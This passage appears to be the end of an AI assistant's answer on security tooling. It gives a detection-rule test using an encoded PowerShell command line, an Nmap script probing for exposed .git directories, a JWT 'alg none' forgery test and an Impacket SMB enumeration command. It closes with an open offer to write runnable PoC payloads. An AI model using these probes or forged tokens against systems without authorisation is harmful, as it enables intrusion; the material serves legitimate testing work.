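    "CommandLine": "powershell.exe -NoP -Enc SQBFAFgA",
}
benign_event = {
    "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "CommandLine": "powershell.exe -File backup.ps1",
}
print(event_matches(suspicious_event, SELECTION), event_matches(benign_event, SELECTION))
```

Pairing every generated rule with at least one matching and one non-matching event catches rules that are too loose as well as rules that never fire.
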
Example low-level code snippets (quick reference)
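- Nmap NSE skeleton (Lua): save as `check-git.nse`, then run `nmap --script ./check-git.nse <target>`

```lua
-- NSE scripts must load the libraries they use
local http = require "http"
local shortport = require "shortport"

description = [[Check for /.git HEAD]]
author = "LLM-assisted"
categories = {"discovery", "safe"}

-- run against ports that look like HTTP services
portrule = shortport.http

action = function(host, port)
  -- http.get takes host, port and path rather than a full URL
  local resp = http.get(host, port, "/.git/HEAD")
  if resp and resp.status == 200 and resp.body then
    return "Found /.git/HEAD: " .. resp.body:sub(1, 200)
  end
  return nil
end
```
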
- Simple Python script to test JWT alg none

```python
import base64
import json

# Paste the full three-part token under test; the value below is truncated.
token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."


def b64url_decode(segment):
    # JWTs strip base64 padding, so restore it before decoding
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


hdr, pl, sig = token.split(".")
print("Header:", json.loads(b64url_decode(hdr)))
print("Payload:", json.loads(b64url_decode(pl)))

# Test by setting alg to none and leaving the signature empty;
# a correctly configured server must reject this token.
new_hdr = base64.urlsafe_b64encode(b'{"alg":"none","typ":"JWT"}').decode().rstrip("=")
new_token = new_hdr + "." + pl + "."
print("Test token:", new_token)
```

- Impacket usage example for share enumeration

```shell
python3 /path/to/impacket/examples/smbclient.py domain/username:password@target
# or from Python using Impacket's SMBConnection class per repo examples.
```

  (See the Impacket examples for the exact API.) (GitHub)

Tooling & Repos to integrate (start here)
- Metasploit Framework — Rapid7 (exploit dev & modules). (GitHub)
- sqlmap — automated SQLi and takeover tool. (GitHub)
- Nmap — network discovery and NSE scripting. (GitHub)
- Impacket — low-level Python network protocol classes for SMB/Kerberos. (GitHub)
- pwntools — exploit dev & binary tooling. (GitHub)
If you want, I can now do one of these concretely for you (for example: produce an LLM-tuned ffuf or nmap pipeline + wrapper script for recon, or generate specific PoC payloads for a web parameter you paste). Pick one item number and I’ll produce the full runnable script + testing instructions (no background tasks — I’ll generate it right here).